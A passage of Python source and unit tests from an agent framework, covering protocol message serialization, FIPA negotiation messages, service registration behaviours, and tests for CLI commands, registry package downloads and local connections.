# game_data.utility_params_by_good_pbk.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["utility_params_by_good_pbk"]))) # type: ignore
# game_data.tx_fee = game_data_json["tx_fee"] # type: ignore
# game_data.agent_pbk_to_name.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["agent_pbk_to_name"]))) # type: ignore
# game_data.good_pbk_to_name.extend(_from_dict_to_pairs(cast(Dict[str, str], game_data_json["good_pbk_to_name"]))) # type: ignore
# tac_msg.initial_state.CopyFrom(game_data)
# transactions = []
# msg_transactions = cast(List[Any], msg.get("transactions"))
# for t in msg_transactions:
# tx = tac_pb2.TACAgent.Transaction() # type: ignore
# tx.transaction_id = t.get("transaction_id")
# tx.counterparty = t.get("counterparty")
# tx.amount_by_currency.extend(_from_dict_to_pairs(t.get("amount_by_currency")))
# tx.sender_tx_fee = t.get("sender_tx_fee")
# tx.counterparty_tx_fee = t.get("counterparty_tx_fee")
# tx.quantities_by_good_pbk.extend(_from_dict_to_pairs(t.get("quantities_by_good_pbk")))
# transactions.append(tx)
# tac_msg.txs.extend(transactions)
# tac_container.state_update.CopyFrom(tac_msg)
elif tac_type == TACMessage.Type.TAC_ERROR:
tac_msg = tac_pb2.TACController.Error() # type: ignore
tac_msg.error_code = TACMessage.ErrorCode(msg.get("error_code")).value
if msg.is_set("error_msg"):
tac_msg.error_msg = msg.get("error_msg")
if msg.is_set("details"):
tac_msg.details.update(msg.get("details"))
tac_container.error.CopyFrom(tac_msg)
else:
raise ValueError("Type not recognized: {}.".format(tac_type))
tac_message_bytes = tac_container.SerializeToString()
return tac_message_bytes
def decode(self, obj: bytes) -> Message:
"""
Decode the message.
:param obj: the bytes object
:return: the message
"""
tac_container = tac_pb2.TACMessage()
tac_container.ParseFromString(obj)
new_body = {} # type: Dict[str, Any]
tac_type = tac_container.WhichOneof("content")
if tac_type == "register":
new_body["type"] = TACMessage.Type.REGISTER
new_body["agent_name"] = tac_container.register.agent_name
elif tac_type == "unregister":
new_body["type"] = TACMessage.Type.UNREGISTER
elif tac_type == "transaction":
new_body["type"] = TACMessage.Type.TRANSACTION
new_body["transaction_id"] = tac_container.transaction.transaction_id
new_body["counterparty"] = tac_container.transaction.counterparty
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.transaction.amount_by_currency)
new_body["sender_tx_fee"] = tac_container.transaction.sender_tx_fee
new_body["counterparty_tx_fee"] = tac_container.transaction.counterparty_tx_fee
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.transaction.quantities_by_good_pbk)
elif tac_type == "get_state_update":
new_body["type"] = TACMessage.Type.GET_STATE_UPDATE
elif tac_type == "cancelled":
new_body["type"] = TACMessage.Type.CANCELLED
elif tac_type == "game_data":
new_body["type"] = TACMessage.Type.GAME_DATA
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.game_data.amount_by_currency)
new_body["exchange_params_by_currency"] = _from_pairs_to_dict(tac_container.game_data.exchange_params_by_currency)
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.game_data.quantities_by_good_pbk)
new_body["utility_params_by_good_pbk"] = _from_pairs_to_dict(tac_container.game_data.utility_params_by_good_pbk)
new_body["tx_fee"] = tac_container.game_data.tx_fee
new_body["agent_pbk_to_name"] = _from_pairs_to_dict(tac_container.game_data.agent_pbk_to_name)
new_body["good_pbk_to_name"] = _from_pairs_to_dict(tac_container.game_data.good_pbk_to_name)
new_body["version_id"] = tac_container.game_data.version_id
elif tac_type == "transaction_confirmation":
new_body["type"] = TACMessage.Type.TRANSACTION_CONFIRMATION
new_body["transaction_id"] = tac_container.transaction_confirmation.transaction_id
new_body["amount_by_currency"] = _from_pairs_to_dict(tac_container.transaction_confirmation.amount_by_currency)
new_body["quantities_by_good_pbk"] = _from_pairs_to_dict(tac_container.transaction_confirmation.quantities_by_good_pbk)
# elif tac_type == "state_update":
# new_body["type"] = TACMessage.Type.STATE_UPDATE
# game_data = dict(
# amount_by_currency=_from_pairs_to_dict(tac_container.state_update.game_data.amount_by_currency),
# exchange_params_by_currency=_from_pairs_to_dict(tac_container.state_update.game_data.exchange_params_by_currency),
# quantities_by_good_pbk=_from_pairs_to_dict(tac_container.state_update.game_data.quantities_by_good_pbk),
# utility_params_by_good_pbk=_from_pairs_to_dict(tac_container.state_update.game_data.utility_params_by_good_pbk),
# tx_fee=tac_container.state_update.game_data.tx_fee,
# agent_pbk_to_name=_from_pairs_to_dict(tac_container.state_update.game_data.agent_pbk_to_name),
# good_pbk_to_name=_from_pairs_to_dict(tac_container.state_update.game_data.good_pbk_to_name),
# version_id=tac_container.state_update.game_data.version_id
# )
# new_body["game_data"] = game_data
# transactions = []
# for transaction in tac_container.state_update.transactions:
# tx_json = dict(
# transaction_id=transaction.transaction_id,
# counterparty=transaction.counterparty,
# amount_by_currency=_from_pairs_to_dict(transaction.amount_by_currency),
# sender_tx_fee=transaction.sender_tx_fee,
# counterparty_tx_fee=transaction.counterparty_tx_fee,
# quantities_by_good_pbk=_from_pairs_to_dict(transaction.quantities_by_good_pbk),
# )
# transactions.append(tx_json)
# new_body["transactions"] = transactions
elif tac_type == "error":
new_body["type"] = TACMessage.Type.TAC_ERROR
new_body["error_code"] = TACMessage.ErrorCode(tac_container.error.error_code)
if tac_container.error.error_msg:
new_body["error_msg"] = tac_container.error.error_msg
if tac_container.error.details:
new_body["details"] = dict(tac_container.error.details)
else:
raise ValueError("Type not recognized.")
tac_type = TACMessage.Type(new_body["type"])
new_body["type"] = tac_type
tac_message = TACMessage(tac_type=tac_type, body=new_body)
return tac_message
```
#### File: skills/tac_negotiation/registration.py
```python
import datetime
from typing import Optional
from aea.protocols.oef.models import Description
from aea.skills.base import SharedClass
class Registration(SharedClass):
"""This class deals with the services registration state."""
def __init__(self, **kwargs):
"""Instantiate the search class."""
self._update_interval = kwargs.pop('update_interval', 5) # type: int
super().__init__(**kwargs)
self._id = 0
self.registered_goods_demanded_description = None # type: Optional[Description]
self.registered_goods_supplied_description = None # type: Optional[Description]
self._last_update_time = datetime.datetime.now() # type: datetime.datetime
@property
def id(self) -> int:
"""Get the search id."""
return self._id
def get_next_id(self) -> int:
"""
Generate the next search id and stores it.
:return: a search id
"""
self._id += 1
return self.id
def is_time_to_update_services(self) -> bool:
"""
Check if the agent should update the service directory.
:return: bool indicating the action
"""
now = datetime.datetime.now()
diff = now - self._last_update_time
result = diff.total_seconds() > self._update_interval
if result:
self._last_update_time = now
return result
```
#### File: skills/weather_station/behaviours.py
```python
import datetime
import logging
import sys
from typing import cast, Optional, TYPE_CHECKING
from aea.skills.base import Behaviour
from aea.protocols.oef.message import OEFMessage
from aea.protocols.oef.models import Description
from aea.protocols.oef.serialization import OEFSerializer, DEFAULT_OEF
if TYPE_CHECKING or "pytest" in sys.modules:
from packages.skills.weather_station.strategy import Strategy
else:
from weather_station_skill.strategy import Strategy
logger = logging.getLogger("aea.weather_station_skill")
SERVICE_ID = ''
class ServiceRegistrationBehaviour(Behaviour):
"""This class implements a behaviour."""
def __init__(self, **kwargs):
"""Initialise the behaviour."""
self._services_interval = kwargs.pop('services_interval', 30) # type: int
super().__init__(**kwargs)
self._last_update_time = datetime.datetime.now() # type: datetime.datetime
self._registered_service_description = None # type: Optional[Description]
def setup(self) -> None:
"""
Implement the setup.
:return: None
"""
self._register_service()
def act(self) -> None:
"""
Implement the act.
:return: None
"""
if self._is_time_to_update_services():
self._unregister_service()
self._register_service()
def teardown(self) -> None:
"""
Implement the task teardown.
:return: None
"""
self._unregister_service()
def _register_service(self) -> None:
"""
Register to the OEF Service Directory.
:return: None
"""
strategy = cast(Strategy, self.context.strategy)
desc = strategy.get_service_description()
self._registered_service_description = desc
oef_msg_id = strategy.get_next_oef_msg_id()
msg = OEFMessage(oef_type=OEFMessage.Type.REGISTER_SERVICE,
id=oef_msg_id,
service_description=desc,
service_id=SERVICE_ID)
self.context.outbox.put_message(to=DEFAULT_OEF,
sender=self.context.agent_public_key,
protocol_id=OEFMessage.protocol_id,
message=OEFSerializer().encode(msg))
logger.info("[{}]: updating weather station services on OEF.".format(self.context.agent_name))
def _unregister_service(self) -> None:
"""
Unregister service from OEF Service Directory.
:return: None
"""
strategy = cast(Strategy, self.context.strategy)
oef_msg_id = strategy.get_next_oef_msg_id()
msg = OEFMessage(oef_type=OEFMessage.Type.UNREGISTER_SERVICE,
id=oef_msg_id,
service_description=self._registered_service_description,
service_id=SERVICE_ID)
self.context.outbox.put_message(to=DEFAULT_OEF,
sender=self.context.agent_public_key,
protocol_id=OEFMessage.protocol_id,
message=OEFSerializer().encode(msg))
logger.info("[{}]: unregistering weather station services from OEF.".format(self.context.agent_name))
self._registered_service_description = None
def _is_time_to_update_services(self) -> bool:
"""
Check if the agent should update the service directory.
:return: bool indicating the action
"""
now = datetime.datetime.now()
diff = now - self._last_update_time
result = diff.total_seconds() > self._services_interval
if result:
self._last_update_time = now
return result
```
#### File: protocols/fipa/message.py
```python
from enum import Enum
from typing import Dict, List, Optional, Tuple, Union, cast
from aea.protocols.base import Message
from aea.protocols.oef.models import Description, Query
class FIPAMessage(Message):
"""The FIPA message class."""
protocol_id = "fipa"
STARTING_MESSAGE_ID = 1
STARTING_TARGET = 0
class Performative(Enum):
"""FIPA performatives."""
CFP = "cfp"
PROPOSE = "propose"
ACCEPT = "accept"
MATCH_ACCEPT = "match_accept"
DECLINE = "decline"
INFORM = "inform"
ACCEPT_W_ADDRESS = "accept_w_address"
MATCH_ACCEPT_W_ADDRESS = "match_accept_w_address"
def __str__(self):
"""Get string representation."""
return self.value
def __init__(self, dialogue_reference: Tuple[str, str] = None,
message_id: Optional[int] = None,
target: Optional[int] = None,
performative: Optional[Union[str, Performative]] = None,
**kwargs):
"""
Initialize.
:param message_id: the message id.
:param dialogue_reference: the dialogue reference.
:param target: the message target.
:param performative: the message performative.
"""
super().__init__(message_id=message_id,
dialogue_reference=dialogue_reference,
target=target,
performative=FIPAMessage.Performative(performative),
**kwargs)
assert self.check_consistency(), "FIPAMessage initialization inconsistent."
def check_consistency(self) -> bool:
"""Check that the data is consistent."""
try:
assert self.is_set("dialogue_reference")
dialogue_reference = self.get("dialogue_reference")
assert type(dialogue_reference) == tuple
dialogue_reference = cast(Tuple, dialogue_reference)
assert type(dialogue_reference[0]) == str and type(dialogue_reference[0]) == str
assert self.is_set("message_id")
assert type(self.get("message_id")) == int
assert self.is_set("target")
assert type(self.get("target")) == int
performative = FIPAMessage.Performative(self.get("performative"))
if performative == FIPAMessage.Performative.CFP:
assert self.is_set("query")
query = self.get("query")
assert isinstance(query, Query) or isinstance(query, bytes) or query is None
assert len(self.body) == 5
elif performative == FIPAMessage.Performative.PROPOSE:
assert self.is_set("proposal")
proposal = self.get("proposal")
assert type(proposal) == list and all(isinstance(d, Description) or type(d) == bytes for d in proposal) # type: ignore
assert len(self.body) == 5
elif performative == FIPAMessage.Performative.ACCEPT \
or performative == FIPAMessage.Performative.MATCH_ACCEPT \
or performative == FIPAMessage.Performative.DECLINE:
assert len(self.body) == 4
elif performative == FIPAMessage.Performative.ACCEPT_W_ADDRESS\
or performative == FIPAMessage.Performative.MATCH_ACCEPT_W_ADDRESS:
assert self.is_set("address")
assert len(self.body) == 5
elif performative == FIPAMessage.Performative.INFORM:
assert self.is_set("json_data")
json_data = self.get("json_data")
assert isinstance(json_data, dict)
assert len(self.body) == 5
else:
raise ValueError("Performative not recognized.")
except (AssertionError, ValueError, KeyError):
return False
return True
VALID_PREVIOUS_PERFORMATIVES = {
FIPAMessage.Performative.CFP: [None],
FIPAMessage.Performative.PROPOSE: [FIPAMessage.Performative.CFP],
FIPAMessage.Performative.ACCEPT: [FIPAMessage.Performative.PROPOSE],
FIPAMessage.Performative.ACCEPT_W_ADDRESS: [FIPAMessage.Performative.PROPOSE],
FIPAMessage.Performative.MATCH_ACCEPT: [FIPAMessage.Performative.ACCEPT, FIPAMessage.Performative.ACCEPT_W_ADDRESS],
FIPAMessage.Performative.MATCH_ACCEPT_W_ADDRESS: [FIPAMessage.Performative.ACCEPT, FIPAMessage.Performative.ACCEPT_W_ADDRESS],
FIPAMessage.Performative.INFORM: [FIPAMessage.Performative.MATCH_ACCEPT, FIPAMessage.Performative.MATCH_ACCEPT_W_ADDRESS, FIPAMessage.Performative.INFORM],
FIPAMessage.Performative.DECLINE: [FIPAMessage.Performative.CFP, FIPAMessage.Performative.PROPOSE, FIPAMessage.Performative.ACCEPT, FIPAMessage.Performative.ACCEPT_W_ADDRESS]
} # type: Dict[FIPAMessage.Performative, List[Union[None, FIPAMessage.Performative]]]
```
#### File: tests/test_cli/test_create.py
```python
import filecmp
import json
import os
import shutil
import tempfile
import unittest
from pathlib import Path
from typing import Dict
from unittest.mock import patch
import jsonschema
import pytest
import yaml
from ..common.click_testing import CliRunner
from jsonschema import Draft4Validator
import aea
import aea.cli.common
from aea.cli import cli
from aea.configurations.base import DEFAULT_AEA_CONFIG_FILE
from aea.configurations.loader import ConfigLoader
from tests.conftest import AGENT_CONFIGURATION_SCHEMA, ROOT_DIR, CONFIGURATION_SCHEMA_DIR, CLI_LOG_OPTION
class TestCreate:
"""Test that the command 'aea create <agent_name>' works as expected."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.schema = json.load(open(AGENT_CONFIGURATION_SCHEMA))
cls.resolver = jsonschema.RefResolver("file://{}/".format(Path(CONFIGURATION_SCHEMA_DIR).absolute()), cls.schema)
cls.validator = Draft4Validator(cls.schema, resolver=cls.resolver)
cls.runner = CliRunner()
cls.agent_name = "myagent"
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "create", cls.agent_name], standalone_mode=False)
def _load_config_file(self) -> Dict:
"""Load a config file."""
agent_config_file = Path(self.agent_name, DEFAULT_AEA_CONFIG_FILE) # type: ignore
file_pointer = open(agent_config_file, mode="r", encoding="utf-8")
agent_config_instance = yaml.safe_load(file_pointer)
return agent_config_instance
def test_exit_code_equal_to_zero(self):
"""Assert that the exit code is equal to zero (i.e. success)."""
assert self.result.exit_code == 0
def test_agent_directory_path_exists(self):
"""Check that the agent's directory has been created."""
agent_dir = Path(self.agent_name)
assert agent_dir.exists()
assert agent_dir.is_dir()
def test_configuration_file_has_been_created(self):
"""Check that an agent's configuration file has been created."""
agent_config_file = Path(self.agent_name, DEFAULT_AEA_CONFIG_FILE)
assert agent_config_file.exists()
assert agent_config_file.is_file()
def test_configuration_file_is_compliant_to_schema(self):
"""Check that the agent's configuration file is compliant with the schema."""
agent_config_instance = self._load_config_file()
try:
self.validator.validate(instance=agent_config_instance)
except jsonschema.exceptions.ValidationError as e:
pytest.fail("Configuration file is not compliant with the schema. Exception: {}".format(str(e)))
def test_aea_version_is_correct(self):
"""Check that the aea version in the configuration file is correct, i.e. the same of the installed package."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["aea_version"] == aea.__version__
def test_agent_name_is_correct(self):
"""Check that the agent name in the configuration file is correct."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["agent_name"] == self.agent_name
def test_authors_field_is_empty_string(self):
"""Check that the 'authors' field in the config file is the empty string."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["authors"] == ""
def test_connections_contains_only_oef(self):
"""Check that the 'connections' list contains only the 'oef' connection."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["connections"] == ["oef"]
def test_default_connection_field_is_oef(self):
"""Check that the 'default_connection' is the 'oef' connection."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["default_connection"] == "oef"
def test_license_field_is_empty_string(self):
"""Check that the 'license' is the empty string."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["license"] == ""
# def test_private_key_pem_path_field_is_empty_string(self):
# """Check that the 'private_key_pem_path' is the empty string."""
# agent_config_instance = self._load_config_file()
# assert agent_config_instance["private_key_pem_path"] == ""
def test_protocols_field_is_not_empty_list(self):
"""Check that the 'protocols' field is a list with the 'default' protocol."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["protocols"] == ["default"]
def test_skills_field_is_empty_list(self):
"""Check that the 'skills' field is a list with the 'error' skill."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["skills"] == ["error"]
def test_url_field_is_empty_string(self):
"""Check that the 'url' field is the empty string."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["url"] == ""
def test_version_field_is_equal_to_v1(self):
"""Check that the 'version' field is equal to the string 'v1'."""
agent_config_instance = self._load_config_file()
assert agent_config_instance["version"] == "v1"
def test_connections_directory_exists(self):
"""Check that the connections directory exists."""
connections_dirpath = Path(self.agent_name, "connections")
assert connections_dirpath.exists()
assert connections_dirpath.is_dir()
def test_connections_contains_oef_connection(self):
"""Check that the connections directory contains the oef directory."""
oef_connection_dirpath = Path(self.agent_name, "connections", "oef")
assert oef_connection_dirpath.exists()
assert oef_connection_dirpath.is_dir()
def test_oef_connection_directory_is_equal_to_library_oef_connection(self):
"""Check that the oef connection directory is equal to the package's one (aea.connections.oef)."""
oef_connection_dirpath = Path(self.agent_name, "connections", "oef")
comparison = filecmp.dircmp(str(oef_connection_dirpath), str(Path(ROOT_DIR, "aea", "connections", "oef")))
assert comparison.diff_files == []
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
os.chdir(cls.cwd)
try:
shutil.rmtree(cls.t)
except (OSError, IOError):
pass
class TestCreateFailsWhenDirectoryAlreadyExists:
"""Test that 'aea create' sub-command fails when the directory with the agent name in input already exists."""
@classmethod
def setup_class(cls):
"""Set up the test class."""
cls.runner = CliRunner()
cls.agent_name = "myagent"
cls.patch = unittest.mock.patch.object(aea.cli.common.logger, 'error')
cls.mocked_logger_error = cls.patch.__enter__()
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
# create a directory with the agent name -> make 'aea create fail.
os.mkdir(cls.agent_name)
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "create", cls.agent_name], standalone_mode=False)
def test_exit_code_equal_to_1(self):
"""Test that the error code is equal to 1 (i.e. catchall for general errors)."""
assert self.result.exit_code == 1
def test_log_error_message(self):
"""Test that the log error message is fixed.
The expected message is: 'Directory already exist. Aborting...'
"""
s = "Directory already exist. Aborting..."
self.mocked_logger_error.assert_called_once_with(s)
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
cls.patch.__exit__()
os.chdir(cls.cwd)
try:
shutil.rmtree(cls.t)
except (OSError, IOError):
pass
class TestCreateFailsWhenConfigFileIsNotCompliant:
"""Test that 'aea create' sub-command fails when the generated configuration file is not compliant with the schema."""
@classmethod
def setup_class(cls):
"""Set up the test class."""
cls.runner = CliRunner()
cls.agent_name = "myagent"
# change the serialization of the AgentConfig class so to make the parsing to fail.
cls.patch = patch.object(aea.configurations.base.AgentConfig, "json", return_value={"hello": "world"})
cls.patch.__enter__()
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "create", cls.agent_name], standalone_mode=False)
def test_exit_code_equal_to_1(self):
"""Test that the error code is equal to 1 (i.e. catchall for general errors)."""
assert self.result.exit_code == 1
def test_agent_folder_is_not_created(self):
"""Test that the agent folder is removed."""
assert not Path(self.agent_name).exists()
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
cls.patch.__exit__()
os.chdir(cls.cwd)
try:
shutil.rmtree(cls.t)
except (OSError, IOError):
pass
class TestCreateFailsWhenExceptionOccurs:
"""Test that 'aea create' sub-command fails when the generated configuration file is not compliant with the schema."""
@classmethod
def setup_class(cls):
"""Set up the test class."""
cls.runner = CliRunner()
cls.agent_name = "myagent"
# change the serialization of the AgentConfig class so to make the parsing to fail.
cls.patch = patch.object(ConfigLoader, "dump", side_effect=Exception)
cls.patch.__enter__()
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "create", cls.agent_name], standalone_mode=False)
def test_exit_code_equal_to_1(self):
"""Test that the error code is equal to 1 (i.e. catchall for general errors)."""
assert self.result.exit_code == 1
def test_agent_folder_is_not_created(self):
"""Test that the agent folder is removed."""
assert not Path(self.agent_name).exists()
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
cls.patch.__exit__()
os.chdir(cls.cwd)
try:
shutil.rmtree(cls.t)
except (OSError, IOError):
pass
```
#### File: tests/test_cli/test_install.py
```python
import os
import tempfile
import unittest.mock
from pathlib import Path
import yaml
from ..common.click_testing import CliRunner
import aea.cli.common
from aea.cli import cli
from aea.configurations.base import DEFAULT_PROTOCOL_CONFIG_FILE
from tests.conftest import CLI_LOG_OPTION, CUR_PATH
class TestInstall:
"""Test that the command 'aea install' works as expected."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.runner = CliRunner()
cls.cwd = os.getcwd()
os.chdir(Path(CUR_PATH, "data", "dummy_aea"))
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "install"], standalone_mode=False)
def test_exit_code_equal_to_zero(self):
"""Assert that the exit code is equal to zero (i.e. success)."""
assert self.result.exit_code == 0
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
os.chdir(cls.cwd)
class TestInstallFromRequirementFile:
"""Test that the command 'aea install --requirement REQ_FILE' works."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.runner = CliRunner()
cls.cwd = os.getcwd()
os.chdir(Path(CUR_PATH, "data", "dummy_aea"))
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "install", "-r", "requirements.txt"], standalone_mode=False)
def test_exit_code_equal_to_zero(self):
"""Assert that the exit code is equal to zero (i.e. success)."""
assert self.result.exit_code == 0
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
os.chdir(cls.cwd)
class TestInstallFails:
"""Test that the command 'aea install' fails when a dependency is not found."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.runner = CliRunner()
cls.agent_name = "myagent"
cls.patch = unittest.mock.patch.object(aea.cli.common.logger, 'error')
cls.mocked_logger_error = cls.patch.__enter__()
cls.cwd = os.getcwd()
cls.t = tempfile.mkdtemp()
os.chdir(cls.t)
result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "create", cls.agent_name], standalone_mode=False)
assert result.exit_code == 0
os.chdir(cls.agent_name)
result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "scaffold", "protocol", "my_protocol"], standalone_mode=False)
assert result.exit_code == 0
config_path = Path("protocols", "my_protocol", DEFAULT_PROTOCOL_CONFIG_FILE)
config = yaml.safe_load(open(config_path))
config.setdefault("dependencies", []).append("this_dependency_does_not_exist")
yaml.safe_dump(config, open(config_path, "w"))
cls.result = cls.runner.invoke(cli, [*CLI_LOG_OPTION, "install"], standalone_mode=False)
def test_exit_code_equal_to_1(self):
"""Assert that the exit code is equal to 1 (i.e. catchall for general errors)."""
assert self.result.exit_code == 1
@classmethod
def teardown_class(cls):
"""Teardowm the test."""
os.chdir(cls.cwd)
```
#### File: test_cli/test_registry/test_utils.py
```python
import os
from unittest import TestCase, mock
from click import ClickException
from aea.cli.registry.utils import (
fetch_package, request_api, split_public_id, _download_file, _extract
)
from aea.cli.registry.settings import REGISTRY_API_URL
@mock.patch(
'aea.cli.registry.utils.split_public_id',
return_value=['owner', 'name', 'version']
)
@mock.patch(
'aea.cli.registry.utils.request_api',
return_value={'file': 'url'}
)
@mock.patch(
'aea.cli.registry.utils._download_file',
return_value='filepath'
)
@mock.patch('aea.cli.registry.utils._extract')
class FetchPackageTestCase(TestCase):
"""Test case for fetch_package method."""
def test_fetch_package_positive(
self,
_extract_mock,
_download_file_mock,
request_api_mock,
split_public_id_mock
):
"""Test for fetch_package method positive result."""
obj_type = 'connection'
public_id = 'owner/name:version'
cwd = 'cwd'
fetch_package(obj_type, public_id, cwd)
split_public_id_mock.assert_called_with(public_id)
request_api_mock.assert_called_with(
'GET', '/connections/owner/name/version'
)
_download_file_mock.assert_called_once_with('url', 'cwd')
_extract_mock.assert_called_once_with('filepath', 'cwd/connections')
@mock.patch('aea.cli.registry.utils.requests.request')
class RequestAPITestCase(TestCase):
"""Test case for request_api method."""
def test_request_api_positive(self, request_mock):
"""Test for fetch_package method positive result."""
expected_result = {'correct': 'json'}
resp_mock = mock.Mock()
resp_mock.json = lambda: expected_result
resp_mock.status_code = 200
request_mock.return_value = resp_mock
result = request_api('GET', '/path')
request_mock.assert_called_once_with(
method='GET',
params=None,
url=REGISTRY_API_URL + '/path'
)
self.assertEqual(result, expected_result)
def test_request_api_404(self, request_mock):
"""Test for fetch_package method 404 sever response."""
resp_mock = mock.Mock()
resp_mock.status_code = 404
request_mock.return_value = resp_mock
with self.assertRaises(ClickException):
request_api('GET', '/path')
def test_request_api_403(self, request_mock):
"""Test for fetch_package method not authorized sever response."""
resp_mock = mock.Mock()
resp_mock.status_code = 403
request_mock.return_value = resp_mock
with self.assertRaises(ClickException):
request_api('GET', '/path')
def test_request_api_unexpected_response(self, request_mock):
"""Test for fetch_package method unexpected sever response."""
resp_mock = mock.Mock()
resp_mock.status_code = 500
request_mock.return_value = resp_mock
with self.assertRaises(ClickException):
request_api('GET', '/path')
class SplitPublicIDTestCase(TestCase):
"""Test case for request_api method."""
def test_split_public_id_positive(self):
"""Test for split_public_id method positive result."""
public_id = 'owner/name:version'
expected_result = ['owner', 'name', 'version']
result = split_public_id(public_id)
self.assertEqual(result, expected_result)
@mock.patch('aea.cli.registry.utils.requests.get')
class DownloadFileTestCase(TestCase):
"""Test case for _download_file method."""
@mock.patch('builtins.open', mock.mock_open())
def test_download_file_positive(self, get_mock):
"""Test for _download_file method positive result."""
filename = 'filename.tar.gz'
url = 'url/{}'.format(filename)
cwd = 'cwd'
filepath = os.path.join(cwd, filename)
resp_mock = mock.Mock()
raw_mock = mock.Mock()
raw_mock.read = lambda: 'file content'
resp_mock.raw = raw_mock
resp_mock.status_code = 200
get_mock.return_value = resp_mock
result = _download_file(url, cwd)
expected_result = filepath
self.assertEqual(result, expected_result)
get_mock.assert_called_once_with(url, stream=True)
def test_download_file_wrong_response(self, get_mock):
"""Test for _download_file method wrong response from file server."""
resp_mock = mock.Mock()
resp_mock.status_code = 404
get_mock.return_value = resp_mock
with self.assertRaises(ClickException):
_download_file('url', 'cwd')
class ExtractTestCase(TestCase):
"""Test case for _extract method."""
@mock.patch('aea.cli.registry.utils.os.remove')
@mock.patch('aea.cli.registry.utils.tarfile.open')
def test_extract_positive(self, tarfile_open_mock, os_remove_mock):
"""Test for _extract method positive result."""
source = 'file.tar.gz'
target = 'target-folder'
tar_mock = mock.Mock()
tar_mock.extractall = lambda path: None
tar_mock.close = lambda: None
tarfile_open_mock.return_value = tar_mock
_extract(source, target)
tarfile_open_mock.assert_called_once_with(source, 'r:gz')
os_remove_mock.assert_called_once_with(source)
def test_extract_wrong_file_type(self):
"""Test for _extract method wrong file type."""
source = 'file.wrong'
target = 'target-folder'
with self.assertRaises(Exception):
_extract(source, target)
```
#### File: test_connections/test_local/test_misc.py
```python
import asyncio
import unittest.mock
import pytest
from aea.connections.local.connection import LocalNode, OEFLocalConnection
from aea.mail.base import Envelope, AEAConnectionError, Multiplexer
from aea.protocols.default.message import DefaultMessage
from aea.protocols.default.serialization import DefaultSerializer
from aea.protocols.fipa.message import FIPAMessage
from aea.protocols.fipa.serialization import FIPASerializer
def test_connection():
"""Test that two OEF local connection can connect to a local node."""
with LocalNode() as node:
multiplexer1 = Multiplexer([OEFLocalConnection("multiplexer1", node)])
multiplexer2 = Multiplexer([OEFLocalConnection("multiplexer2", node)])
multiplexer1.connect()
multiplexer2.connect()
multiplexer1.disconnect()
multiplexer2.disconnect()
@pytest.mark.asyncio
async def test_connection_twice_return_none():
"""Test that connecting twice works."""
with LocalNode() as node:
public_key = "public_key"
connection = OEFLocalConnection(public_key, node)
await connection.connect()
await node.connect(public_key, connection._reader)
message = DefaultMessage(type=DefaultMessage.Type.BYTES, content=b"hello")
message_bytes = DefaultSerializer().encode(message)
expected_envelope = Envelope(to=public_key, sender=public_key, protocol_id="default", message=message_bytes)
await connection.send(expected_envelope)
actual_envelope = await connection.receive()
assert expected_envelope == actual_envelope
await connection.disconnect()
@pytest.mark.asyncio
async def test_receiving_when_not_connected_raise_exception():
"""Test that when we try to receive an envelope from a not connected connection we raise exception."""
with pytest.raises(AEAConnectionError, match="Connection not established yet."):
with LocalNode() as node:
public_key = "public_key"
connection = OEFLocalConnection(public_key, node)
await connection.receive()
@pytest.mark.asyncio
async def test_receiving_returns_none_when_error_occurs():
"""Test that when we try to receive an envelope and an error occurs we return None."""
with LocalNode() as node:
public_key = "public_key"
connection = OEFLocalConnection(public_key, node)
await connection.connect()
with unittest.mock.patch.object(connection._reader, "get", side_effect=Exception):
result = await connection.receive()
assert result is None
await connection.disconnect()
def test_communication():
"""Test that two multiplexer can communicate through the node."""
with LocalNode() as node:
multiplexer1 = Multiplexer([OEFLocalConnection("multiplexer1", node)])
multiplexer2 = Multiplexer([OEFLocalConnection("multiplexer2", node)])
multiplexer1.connect()
multiplexer2.connect()
msg = DefaultMessage(type=DefaultMessage.Type.BYTES, content=b"hello")
msg_bytes = DefaultSerializer().encode(msg)
envelope = Envelope(to="multiplexer2", sender="multiplexer1", protocol_id=DefaultMessage.protocol_id, message=msg_bytes)
multiplexer1.put(envelope)
msg = FIPAMessage((str(0), ''), 0, 0, FIPAMessage.Performative.CFP, query=None)
msg_bytes = FIPASerializer().encode(msg)
envelope = Envelope(to="multiplexer2", sender="multiplexer1", protocol_id=FIPAMessage.protocol_id, message=msg_bytes)
multiplexer1.put(envelope)
